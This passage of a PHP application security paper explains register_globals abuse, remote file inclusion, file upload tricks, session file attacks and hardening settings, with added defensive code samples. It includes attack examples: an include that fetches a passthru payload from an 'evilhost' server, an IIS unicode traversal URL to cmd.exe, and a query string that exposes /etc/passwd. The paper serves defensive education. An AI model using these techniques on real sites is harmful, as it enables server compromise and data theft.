EXPLICITLY set_. When you've got a rather large number of variables, this
can be a much harder task than it may sound.

One common approach to protecting a script is to check that the variable is
not in the array HTTP_GET/POST_VARS[] (depending on the method normally used
to submit the form, GET or POST). When PHP is configured with track_vars
enabled (as it is by default) variables submitted by the user are available
both from the global variables and also as elements in the arrays mentioned
above. However, it's important to note that there are FOUR different arrays
for remote user input, HTTP_GET_VARS for variables submitted in the URL of
the get request, HTTP_POST_VARS for variables submitted in the post section
of a HTTP request, HTTP_COOKIE_VARS for variables submitted as part of the
cookie headers in the HTTP request and to a limited degree the
HTTP_POST_FILES array (in more recent versions of PHP). It is completely the
end user's choice which method they use to submit variables, one request can
easily place variables in all four different arrays, a secure script needs
to check all four (though again, the HTTP_POST_FILES array shouldn't be an
issue except in exceptional circumstances).
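
Added example (not part of the original paper): a self-contained sketch for
a current PHP CLI that emulates register_globals with extract() and runs the
authentication pattern above beside a version that initializes $auth and
reads the password from the POST array only. The function names, the request
arrays and EXPECTED_PASS are assumptions made for this illustration.

```php
<?php
// Added illustration, not code from the paper. The request arrays below are
// constructed sample input; all function names are hypothetical.

const EXPECTED_PASS = 'hello'; // placeholder value taken from the paper's example

// Emulate register_globals: GET, POST and cookie variables are merged (later
// sources win) and become ordinary variables before the script body runs.
function import_request(array $get, array $post, array $cookie): array
{
    return array_merge($get, $post, $cookie);
}

// The paper's pattern: $auth is assigned on success and never initialized.
function vulnerable_check(array $get, array $post, array $cookie): bool
{
    $input = import_request($get, $post, $cookie);
    extract($input);                       // what register_globals does
    if (isset($pass) && $pass == EXPECTED_PASS) {
        $auth = 1;
    }
    return isset($auth) && $auth == 1;     // may hold a value from the request
}

// Hardened: every security-relevant variable gets an explicit initial value
// and input is read from exactly one named source.
function hardened_check(array $get, array $post, array $cookie): bool
{
    $auth = false;
    $pass = (isset($post['pass']) && is_string($post['pass'])) ? $post['pass'] : '';
    if (hash_equals(EXPECTED_PASS, $pass)) {   // constant-time comparison
        $auth = true;
    }
    return $auth;
}

// Constructed requests: [GET, POST, COOKIE].
$requests = [
    'correct password via POST'  => [[], ['pass' => 'hello'], []],
    'auth=1 in the query string' => [['auth' => '1'], [], []],
    'auth=1 in a cookie'         => [[], [], ['auth' => '1']],
    'wrong password'             => [[], ['pass' => 'guess'], []],
];
foreach ($requests as $label => [$get, $post, $cookie]) {
    printf("%-28s vulnerable=%-5s hardened=%s\n", $label,
        var_export(vulnerable_check($get, $post, $cookie), true),
        var_export(hardened_check($get, $post, $cookie), true));
}
```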

"No man burdens his mind with small matters unless he has some very good
reason for doing so." - John Watson

--- < 4. Remote Files > ----------------------------------------------------

I'm going to repeat this frequently during this document but it bears
repeating, PHP is an extremely feature rich language. It ships with an
amazing amount of functionality out of the box and tries hard to make life
as easy as possible for the coder (or web designer as the case so often is).
From a security perspective, the more superfluous functionality offered by a
language and the less intuitive the possibilities, the more difficult it is
to secure applications written in it. An excellent example of this is the
Remote Files functionality of PHP.

The following piece of PHP code is designed to open a file:

 <?php
  // Try to open the file for reading and report a failure
  if (!($fd = fopen("$filename", "r")))
   echo("Could not open file: $filename<BR>\n");
 ?>

The code attempts to open the file specified in the variable $filename for
reading and if it fails displays an error. Obviously this could be a simple
security issue if the user can set $filename and get the script to expose
/etc/passwd for example but one non intuitive thing this code could end up
doing is reading data from another web/ftp site. The remote files
functionality means that the majority of PHP's file handling functions can
work transparently on remote files via HTTP and FTP. If $filename were to
contain (for example)
"http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" PHP will
actually make a HTTP request to the server "target", in this case trying to
exploit the unicode flaw.

This gets more interesting in the context of four other file functions that
support remote file functionality (*** except under Windows ***), include(),
require(), include_once() and require_once(). These functions take in a
filename and read that file and parse it as PHP code. They're typically used
to support the concept of code libraries, where common bits of PHP code are
stored in files and included as needed. Now take the following piece of
code:

 <?php
  include($libdir . "/languages.php");
 ?>

Presumably $libdir is a configuration variable that is meant to be set
earlier in script execution to the directory where the library files are
stored. If the attacker can cause the variable not to be set by the script
(which is typically not a tremendously difficult task) and instead submit it
themselves they can modify the start of the path. This would normally gain
them nothing since they still end up only being able to access languages.php
in a directory of their choosing (poison null attacks like those possible on
Perl don't work under PHP) but with remote files the attacker can submit any
code they wish to be executed. For example, if the attacker places a file on
a web server called languages.php containing the following:

 <?php
  passthru("/bin/ls /etc");
 ?>

then sets $libdir to "http://<evilhost>/" upon encountering the include
statement PHP will make a HTTP request to evilhost, retrieve the attacker's
code and execute it, returning a listing of /etc to the attacker's web
browser. Note that the attacking webserver (evilhost) can't be running PHP
or the code will be run on the attacking machine rather than the target
machine (see the "Other" section and its reference to SRADV00006 for an
example of code which survives being on a PHP enabled attacking machine).

"There are no crimes and no criminals in these days" - Sherlock Holmes

--- < 5. File Upload > -----------------------------------------------------

As if PHP hadn't already provided enough to make life easier for the
attacker the language provides automatic support for RFC 1867 based file
upload. Take the following form:

 <FORM METHOD="POST" ENCTYPE="multipart/form-data">
 <INPUT TYPE="FILE" NAME="hello">
 <INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240">
 <INPUT TYPE="SUBMIT">
 </FORM>

This form will allow the web browser user to select a file from their local
machine then when they click submit the file will be uploaded to the remote
web server. This is obviously useful functionality but it is PHP's response that
makes this dangerous. When PHP first receives the request, before it has
even BEGUN to parse the PHP script being called it will automatically
receive the file from the remote user, it will then check that the file is
no larger than specified in the $MAX_FILE_SIZE variable (10 kb in this case)
and the maximum file size set in the PHP configuration file, if it passes
these tests the file is SAVED on the local disk in a temporary directory.
Please read that again if that doesn't make you blink, a remote user can
send any file they wish to a PHP enabled machine and before a script has
even specified whether or not it accepts file uploads that file is SAVED on
the local disk.

I'm going to ignore any resource exhaustion attacks that may or may not be
possible using file upload functionality, I think they're fairly limited if
not impossible in any case.

First let's consider a script that IS designed to receive file uploads. As
described above the file is received and saved on the local disk (in the
location specified in the configuration for uploaded files, typically /tmp)
with a random filename (e.g "phpxXuoXG"). The PHP script then needs
information regarding the uploaded file to be able to process it. This is
actually provided in two different ways, one has been in use since early
versions of PHP 3, the other was introduced following our Advisory regarding
the issue I'm about to describe with the former method. Suffice to say the
problem is still alive and well, most scripts continue to use the old
method. PHP sets four global variables to describe the uploaded file, for
example (given the upload form above):

 $hello = Filename on local machine (e.g "/tmp/phpxXuoXG")
 $hello_size = Size in bytes of file (e.g 1024)
 $hello_name = The original name of the file on the remote system (e.g "c:\\temp\\hello.txt")
 $hello_type = Mime type of uploaded file (e.g "text/plain")

The PHP script then proceeds to work on the file as located via the $hello
variable. The problem is that it isn't immediately obvious that $hello need
not really be a PHP set variable and can simply be set by a remote attacker.
Take the following form input for example:


http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt

That results in the following global PHP variables (of course POST could be
used (even cookies)):

 $hello = "/etc/passwd"
 $hello_size = 10240
 $hello_type = "text/plain"
 $hello_name = "hello.txt"

This form input will provide exactly the variables the PHP script expects
to be set by PHP, but instead of working on an uploaded file the script will
in fact be working on /etc/passwd (usually resulting in its content being
exposed). This attack can be used to expose the contents of all sorts of
sensitive files (in particular configuration files containing database and
other third tier server credentials).

I noted above that newer versions of PHP provide different methods for
determining the uploaded files (it's done via the HTTP_POST_FILES[] array
mentioned earlier). It also provides numerous functions to avoid this
problem, for example a function to determine if a particular file is
actually one that has been uploaded. These methods well and truly fix the
problem but there is certainly no shortage of scripts out there still using
the old method and still vulnerable to this sort of attack.
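
Added example (not part of the original paper): a sketch of an upload
handler for a current PHP version that takes the temporary path only from
the $_FILES array (the later name for HTTP_POST_FILES) and confirms it with
is_uploaded_file() before touching it. store_upload(), the destination
directory and the size limit are assumptions; the forged entry at the
bottom is constructed input.

```php
<?php
// Added illustration, not code from the paper. store_upload() and the
// destination directory are hypothetical; "hello" is the paper's field name.

function store_upload(array $files, string $field, string $destDir, int $maxBytes = 10240): string
{
    // Only the per-request upload table is consulted; request variables
    // named "hello", "hello_name" and so on never reach this function.
    if (!isset($files[$field]) || !is_array($files[$field])) {
        throw new RuntimeException('no upload in field ' . $field);
    }
    $f = $files[$field];
    if (!isset($f['error'], $f['tmp_name'], $f['size']) || !is_string($f['tmp_name'])) {
        throw new RuntimeException('malformed upload entry');
    }
    if ($f['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . $f['error']);
    }
    // True only for a file PHP itself received in this POST request.
    if (!is_uploaded_file($f['tmp_name'])) {
        throw new RuntimeException('not an uploaded file: ' . $f['tmp_name']);
    }
    // Enforce the limit on the server; MAX_FILE_SIZE in the form is client data.
    if ($f['size'] > $maxBytes || filesize($f['tmp_name']) > $maxBytes) {
        throw new RuntimeException('upload too large');
    }
    // The stored name is generated here; the client-supplied name is not used.
    $target = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(16)) . '.upload';
    if (!move_uploaded_file($f['tmp_name'], $target)) {
        throw new RuntimeException('could not move upload');
    }
    return $target;
}

// Constructed input: an upload entry whose tmp_name points at a local file.
// Nothing was uploaded when this runs from the command line, so it is rejected.
$forged = ['hello' => [
    'name' => 'hello.txt', 'type' => 'text/plain',
    'tmp_name' => '/etc/passwd', 'size' => 10240, 'error' => UPLOAD_ERR_OK,
]];
try {
    echo store_upload($forged, 'hello', sys_get_temp_dir()), "\n";
} catch (RuntimeException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```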

As an alternate attack assisted by file upload consider the following
example PHP code:

 <?php
  // Checks the file exists on the local system (no remote files)
  if (file_exists($theme))
   include("$theme");
 ?>

If the attacker can control $theme they can obviously use this to read any
file on the remote system (except that content inside PHP tags e.g "<?" will
be removed and interpreted probably crashing immediately). While this is a
problem the attacker's ultimate goal is obviously to be able to execute
commands on the remote web server and they can't achieve that by getting the
include statement to work on remote files as discussed earlier. They
therefore need to get PHP code they define into a file local to the remote
machine. This sounds like an impossible task initially but file upload comes
to the rescue. If the attacker creates a file on their machine containing
PHP code to be executed (for example the passthru code shown earlier) then
creates a form which contains a file field called "theme" and uses this form
to submit the file to the script via file upload, PHP will be kind enough to
save the file and set $theme to the location of the attacker's file on the
local machine. The file_exists() check will then succeed and the code will
be run.

Given command execution ability on the remote webserver the attacker will
obviously wish to attempt privilege escalation attacks or attacks on the
third tier servers, both of which will probably require a toolset not
present on the webserver. The file upload functionality once again makes
this a non issue, the attacker can simply upload the attack tools, have them
saved by PHP then use their code execution ability to chmod() the file and
execute it. For example, they could trivially upload a local root exploit
(through the firewall and past the IDS) and execute it.

"It was easier to know it than to explain why I knew it. If you were asked
to prove that two and two made four, you might find some difficulty, and yet
you are quite sure of the fact" - Sherlock Holmes

--- < 6. Library Files > ---------------------------------------------------

I've mentioned the include() and require() functions earlier, I also said
that they're generally used to support the concept of code libraries. What I
mean by that is that common bits of code are put into a separate file and
when needed in the application simply include()ed from the file. include()
and require() will take any specified filename and read the file and parse
its contents as PHP code.

Initially when people started developing and distributing PHP applications
they chose to distinguish library and main application code by giving
library files the '.inc' extension. However they quickly found this was a
bad move in general since such files aren't normally parsed as PHP code by
the PHP interpreter. If requested from the web server they will generally
have the full source code returned. This is because the PHP interpreter
(when used as an apache module) determines which files to parse for PHP code
based on the file's extension, the extensions to be interpreted can be
chosen by the administrator but usually a combination of the extensions
'.php', '.php4' and '.php3' is chosen. This is a real problem when sensitive
configuration data (e.g database credentials) is placed in PHP files that
don't have an appropriate extension since a remote attacker can easily get
the source.

The simplest solution (and the one that has since become favored) is simply
to give EVERY file a PHP parsed extension. This prevents a request to the
web server ever returning the raw source for a file that contains PHP code.
The problem here is that though the source will no longer be returned, by
requesting the file a remote attacker can have the code that is meant to be
used in a framework of other code executed out of context. This can lead to
all of the attacks I've described earlier.

An obvious example might be the following:

In main.php:
 <?php
  $libDir = "/libdir";
  $langDir = "$libDir/languages";

  // ...

  include("$libDir/loadlanguage.php");
 ?>

In libdir/loadlanguage.php:
 <?php
  // ...

  include("$langDir/$userLang");
 ?>

When libdir/loadlanguage.php is called in the defined context of main.php it
is perfectly safe. But because libdir/loadlanguage.php has the extension .php
(it doesn't have to have that extension, include() works on any file) it can
be requested and executed by a remote attacker. When out of context an
attacker can set $langDir and $userLang to whatever they wish.
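
Added example (not part of the original paper), covering both the
include($libdir . "/languages.php") case from section 4 and the
loadlanguage.php case above: a guard that stops a library file from doing
anything when requested directly, and a lookup that keeps request input out
of the string passed to include(). APP_ENTRY, language_file() and the
language table are assumptions; the inputs at the bottom are constructed.

```php
<?php
// Added illustration, not code from the paper. The two sections below stand
// for two files and are shown in one script so the sketch runs on its own.

// ---- main.php (the only file meant to be requested) ----------------------
define('APP_ENTRY', 1);            // a constant cannot be supplied by a request
$libDir  = __DIR__ . '/libdir';    // assigned unconditionally, before any use
$langDir = $libDir . '/languages';

// ---- libdir/loadlanguage.php ---------------------------------------------
// First statement of every library file: do nothing when requested directly,
// because then no entry point has defined the constant.
if (!defined('APP_ENTRY')) {
    exit('Direct access not permitted');
}

// Resolve the requested language through a fixed table, so the string that
// reaches include() is chosen by the application, not copied from input.
function language_file(string $langDir, $userLang): string
{
    $languages = ['en' => 'english.php', 'de' => 'german.php'];
    $key = (is_string($userLang) && isset($languages[$userLang])) ? $userLang : 'en';
    return $langDir . '/' . $languages[$key];
}

// Constructed inputs: one valid choice and three values of the kind the
// paper describes (a remote URL, a path outside the library, a non-string).
$inputs = ['de', 'http://evilhost.invalid/languages.php', '../../../etc/passwd', ['x']];
foreach ($inputs as $userLang) {
    printf("%-42s -> %s\n",
        json_encode($userLang, JSON_UNESCAPED_SLASHES),
        language_file($langDir, $userLang));
    // In the application: include language_file($langDir, $userLang);
}
```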

"You know a conjuror gets no credit when once he has explained his trick and
if I show you too much of my method of working, you will come to the
conclusion that I am a very ordinary individual after all" - Sherlock Holmes

--- < 7. Session Files > ---------------------------------------------------

Later versions of PHP (4 and above) provide built-in support for 'sessions'.
Their basic purpose is to be able to save state information from page to
page in a PHP application. For example, when a user logs in to a web site,
the fact that they are logged in (and who they are logged in as) could be saved
in the session. When they move around the site this information will be
available to all other PHP pages. What actually happens is that when a
session is started (it's typically set in the configuration file to be
automatically started on first request) a random session id is generated,
the session persists as long as the remote browser always submits this
session id with requests. This is most easily achieved with a cookie but can
also be achieved by putting a form variable (containing the session
id) on every page. The session is a variable store, a PHP application can
choose to register a particular variable with the session, its value is then
stored in a session file at the end of every PHP script and loaded into the
variable at the start of every script. A trivial example is as follows:

 <?php
  session_destroy(); // Kill any data currently in the session
  $session_auth = "shaun";
  // Register $session_auth as a session variable
  session_register("session_auth");
 ?>

Any later PHP scripts will automatically have the variable $session_auth set
to "shaun", if they modify it later scripts will receive the modified value.
This is obviously a very handy facility to have in a stateless environment
like the web but caution is also necessary.

One obvious problem is with ensuring that variables actually come from the
session. For example, given the above code, if a later script does the
following:

 <?php
  if (!empty($session_auth))
   // Grant access to site here
 ?>

This code makes the assumption that if $session_auth is set, it must have
come from the session and not from remote input. If an attacker specified
$session_auth in form input they can gain access to the site. Note that the
attacker must use this attack before the variable is registered with the
session, once a variable is in a session it will override any form input.

Session data is saved in a file (in a configurable location, usually /tmp)
named 'sess_<session id>'. This file contains the names of the variables in
the session, their loose type, value and other data. On multi host systems
this can be an issue since the files are saved as the user running the web
server (typically nobody), a malicious site owner can easily create a
session file granting themselves access on another site or even examine the
session files looking for sensitive information.

The session mechanism also supplies another convenient place where an
attacker can have their input saved into a file on the remote machine. For
examples above where the attacker needed PHP code in a file on the remote
machine, if they cannot use file upload they can often use the application
and have a session variable set to a value of their choosing. They can then
guess the location of the session file, they know the filename 'php<session
id>' they just have to guess the directory, usually /tmp.

Finally an issue I haven't found a use for is that an attacker can specify
any session id they wish (e.g 'hello') and have a session file created with
that id (for the example '/tmp/sess_hello'). The id can only contain
alphanumeric characters but this might well be useful in some situations.

"It is a mistake to confound strangeness with mystery" - Sherlock Holmes

--- < 8. Loose Typing And Associative Arrays > -----------------------------

Just a quick note about these factors.

PHP is a loosely typed language, that is, a variable has different values
depending on the context in which it is being evaluated. For example, the
variable $hello set to the empty string "" when evaluated as a number has
the value 0. This can sometimes lead to non intuitive results (a factor that
was important in the exploitation of phpMyAdmin in SRADV00008). If $hello is
set to "000" it is NOT equal to "0" nor will the function empty() return
true.

PHP arrays are associative, that is, the index to the array is a STRING and
can be set to any string value, it is not numerically evaluated. This means
that the array entry $hello["000"] is NOT the same as the array entry
$hello[0].

Applications need to be careful to validate user input with thought to the
above factors and to do so consistently. I.e don't test if something is
equal to 0 in one place and then validate it using empty() somewhere else.

"We want something more than mere preaching now" - Mr. Gregson

--- < 9. Target Functions > ------------------------------------------------

When looking for holes in PHP applications (when you have the source code)
it's useful to have a list of functions that are frequently misused or are
good targets if they happen to be used in a vulnerable manner in the target
application. If a remote user can affect the parameters to these functions
exploitation is often possible. The following is a non exhaustive breakdown.

PHP Code Execution:
require() and include() - Both these functions read a specified file and
interpret the contents as PHP code
eval() - Interprets a given string as PHP code
preg_replace() - When used with the /e modifier this function interprets the
replacement string as PHP code

Command Execution:
exec() - Executes a specified command and returns the last line of the
programs output
passthru() - Executes a specified command and returns all of the output
directly to the remote browser
`` (backticks) - Executes the specified command and returns all the output
in an array
system() - Much the same as passthru() but doesn't handle binary data
popen() - Executes a specified command and connects its output or input
stream to a PHP file descriptor

File Disclosure:
fopen() - Opens a file and associates it with a PHP file descriptor
readfile() - Reads a file and writes its contents directly to the remote
browser
file() - Reads an entire file into an array
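
Added example (not part of the original paper): a small source audit helper
for code review that uses PHP's tokenizer to report calls to the functions
listed above when a variable feeds their arguments. It needs the tokenizer
extension of a current PHP version; the function names and the sample
source (built from the paper's own snippets) are assumptions, and every
reported line still needs a human to trace where the variable comes from.

```php
<?php
// Added illustration, not code from the paper.

const TARGETS = [
    'code execution'    => ['eval', 'include', 'include_once', 'require',
                            'require_once', 'preg_replace'],
    'command execution' => ['exec', 'passthru', 'system', 'popen', '`'],
    'file disclosure'   => ['fopen', 'readfile', 'file'],
];

// Tokenize and drop whitespace/comments; every entry is [id-or-char, text, line].
function significant_tokens(string $source): array
{
    $out = [];
    $line = 1;
    foreach (token_get_all($source) as $tok) {
        if (is_array($tok)) {
            [$id, $text, $at] = $tok;
            $line = $at + substr_count($text, "\n");   // line where the token ends
            if (in_array($id, [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true)) {
                continue;
            }
        } else {
            [$id, $text, $at] = [$tok, $tok, $line];   // single-character token
        }
        $out[] = [$id, $text, $at];
    }
    return $out;
}

function audit_source(string $source): array
{
    $category = [];
    foreach (TARGETS as $label => $names) {
        $category += array_fill_keys($names, $label);
    }
    $keywords  = [T_EVAL, T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE];
    $skipAfter = [T_OBJECT_OPERATOR, T_DOUBLE_COLON, T_FUNCTION, T_NEW];
    $tokens    = significant_tokens($source);
    $findings  = [];
    for ($i = 0, $n = count($tokens); $i < $n; $i++) {
        [$id, $text, $line] = $tokens[$i];
        $name = strtolower(ltrim($text, '\\'));
        if (!isset($category[$name])) {
            continue;
        }
        $isKeyword  = in_array($id, $keywords, true);
        $isBacktick = $id === '`';
        $isName     = $id === T_STRING
            || (defined('T_NAME_FULLY_QUALIFIED') && $id === T_NAME_FULLY_QUALIFIED);
        $isCall     = $isName
            && ($tokens[$i + 1][0] ?? null) === '('
            && !in_array($tokens[$i - 1][0] ?? null, $skipAfter, true);
        if (!$isKeyword && !$isBacktick && !$isCall) {
            continue;
        }
        // Collect variables in the argument list, or up to the closing
        // backtick / end of statement for backticks and include/require.
        $vars = [];
        $depth = 0;
        for ($j = $i + 1; $j < $n; $j++) {
            $jid = $tokens[$j][0];
            if ($jid === T_VARIABLE) {
                $vars[$tokens[$j][1]] = true;
            } elseif ($isBacktick) {
                if ($jid === '`') break;
            } elseif ($jid === '(') {
                $depth++;
            } elseif ($jid === ')' && --$depth <= 0) {
                break;
            } elseif ($jid === ';' || $jid === T_CLOSE_TAG) {
                break;
            }
        }
        if ($isBacktick) {
            $i = $j;                    // skip the closing backtick
        }
        if ($vars) {
            $findings[] = ['line' => $line, 'category' => $category[$name],
                'function' => $isBacktick ? 'backticks' : $name,
                'variables' => array_keys($vars)];
        }
    }
    return $findings;
}

// Constructed sample, assembled from the snippets shown in this paper.
$sample = <<<'PHP'
<?php
if (!($fd = fopen("$filename", "r")))
    echo("Could not open file: $filename<BR>\n");
include($libdir . "/languages.php");
readfile("/var/www/static/banner.html");   // constant argument: not reported
$listing = `ls $dir`;
$obj->exec($cmd);                          // method call: not reported
PHP;

foreach (audit_source($sample) as $f) {
    printf("line %d: %s (%s) uses %s\n", $f['line'], $f['function'],
        $f['category'], implode(', ', $f['variables']));
}
```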

"There is mystery about this which stimulates the imagination; where there
is no imagination there is no horror" - Sherlock Holmes

--- < 10. Protecting PHP > -------------------------------------------------

All of the attacks I've described above work perfectly on a default
installation of PHP 4. However as I've mentioned numerous times PHP is
endlessly configurable and many of these attacks can be defeated using those
configuration options. There is always a price for security though, so I've
classified the following configuration options according to their
painfulness:
 * = Mostly painless
 ** = Vaguely painful
 *** = Seriously hurts
 **** = Chinese Water Torture

Obviously my ratings are subjective so don't flame me for them. I will say
one thing though, if you use all of the options you'll have a very secure
PHP installation, even third party code will be reliably secure, it's just
that most of it won't work :)

**** - Set register_globals off
This option will stop PHP creating global variables for user input. That is,
if a user submits the form variable 'hello' PHP won't set $hello, only
HTTP_GET/POST_VARS['hello']. This is the mother of all other options and is
the best single option for PHP security, it will also kill basically every third
party application available and makes programming PHP a whole lot less
convenient.

*** - Set safe_mode on
I'd love to describe exactly what safe_mode does but it isn't documented
completely. It introduces a large variety of restrictions including:
 - The ability to restrict which commands can be executed (by exec() etc)
 - The ability to restrict which functions can be used
 - Restricts file access based on ownership of script and target file
 - Kills file upload completely
This is a great option for ISP environments (for which it is designed) but
it can also greatly improve the security of normal PHP environments given
proper configuration. It can also be a complete pain in the neck.

** - Set open_basedir
This option prevents any file operations on files outside specified
directories. This can effectively kill a variety of local include() and
remote file attacks. Caution is still required in regards to file upload and
session files.

** - Set display_errors off, log_errors on
This prevents PHP error messages being displayed in the returned web page.
This can effectively limit an attacker's exploration of the function of the
script they are attacking. It can also make debugging very frustrating.

* - Set allow_url_fopen off
This stops remote files functionality. Very few sites really need this
functionality, I absolutely recommend every site set this option.

There may well be other great options I'm missing, please consult the PHP
documentation.

"Our ideas must be as broad as nature if we are to interpret nature" -
Sherlock Holmes

--- < 11. Responsibility - Language Vs Programmer > ------------------------

I contend that it is very hard to write a secure PHP application (in the
default configuration of PHP), even if you try. It's not that PHP is a bad
language, it's amazingly easy to program in and has more builtin features
than any other language I know. However PHP has such emphasis on rapid
development and feature richness that two things happen:
 - Web designers and other non coders end up writing PHP applications. They
have no understanding whatsoever of the security implications of the code
they are writing. Partly this is because the mindset isn't what it should
be. A PHP application typically runs in the most exposed environment
possible, a universally accessible page on a web server. This means the
mindset should be of coding a network daemon that will be routinely
attacked, or of a setuid root application. Instead the mindset is
functionality at all costs like it would be while writing an unprivileged
local application. If your web server is penetrated it provides a gateway to
the third tier, it is always a bad thing, even if the access is as nobody
(as penetrating a PHP application will typically provide).
 - Code behaviour becomes unpredictable. An include() statement that
postfixes a user variable with "image.php" would normally be perfectly safe,
the user can only specify which directory to retrieve that file from (and
presumably cannot create a file image.php on the remote machine). When
remote files functionality is allowed it becomes a nightmare. This is
completely non intuitive.

A lot of people blame programmers for the code they write, I personally
feel that if a language makes it hard for a programmer to write good code
(particularly by being counterintuitive) the language must itself take some
of the blame for the situation. It's not good enough to just say the
programmer should know better. In almost every PHP application I've audited
the programmers have _tried_ to get it right and only been let down by
their understanding of the intricacies of PHP. In its search for the
ultimate functionality PHP has undermined the programmer's ability to
understand the workings of their code in all situations.

"I have all the facts in my journal, and the public shall know them" - John
Watson

--- < 12. Other > ----------------------------------------------------------

This is just a section for various other resources.

At a time when I thought no-one else was interested in PHP security, a few
great posts/advisories/papers have popped up:
- Rain Forest Puppy
 RFP 2101 - "RFPlutonium to fuel your PHP-Nuke"
 http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=2
- João Gouveia
 Many posts to Bugtraq, check them all out, but as a selection
 http://www.securityfocus.com/templates/archive.pike?list=1&mid=165519
 http://www.securityfocus.com/templates/archive.pike?list=1&mid=147104
- Jouko Pynnonen
 http://www.securityfocus.com/templates/archive.pike?list=1&mid=169045

There are many others, sorry I didn't list them all.

SecureReality have released a number of advisories regarding PHP
applications which should serve to illustrate the problems I've outlined in
this paper fairly well:
- SRADV00001 - Arbitrary File Disclosure through PHP File Upload
 http://www.securereality.com.au/sradv00001.html
- SRADV00003 - Arbitrary File Disclosure through IMP
 http://www.securereality.com.au/sradv00003.html
- SRADV00006 - Remote command execution vulnerabilities in phpGroupWare
 http://www.securereality.com.au/sradv00006.html
- SRADV00008 - Remote command execution vulnerabilities in phpMyAdmin and
phpPgAdmin
 http://www.securereality.com.au/sradv00008.txt
- SRADV00009 - Remote command execution vulnerabilities in phpSecurePages
 http://www.securereality.com.au/sradv00009.txt
- SRADV00010 - Remote command execution vulnerabilities in SquirrelMail
 http://www.securereality.com.au/sradv00010.txt
- SRADV00011 - Remote command execution vulnerabilities in WebCalendar
 http://www.securereality.com.au/sradv00011.txt

The last four were presented during my speech at the BlackHat Briefings in
Singapore and Asia in 2001. Audio/Video of the speech will (at some stage)
be available at http://www.blackhat.com. For anyone interested in security,
I can't suggest more strongly that you go to the briefings.

Finally, in case anyone wondered where the title came from and all those
quotes at the end of each section, they're from the short story "A Study In
Scarlet" by Sir Arthur Conan Doyle, which was also the first story in which
the character Sherlock Holmes appeared.

"I must thank you for it all. I might not have gone but for you, and so have
missed the finest study I ever came across: a study in scarlet eh?" -
Sherlock Holmes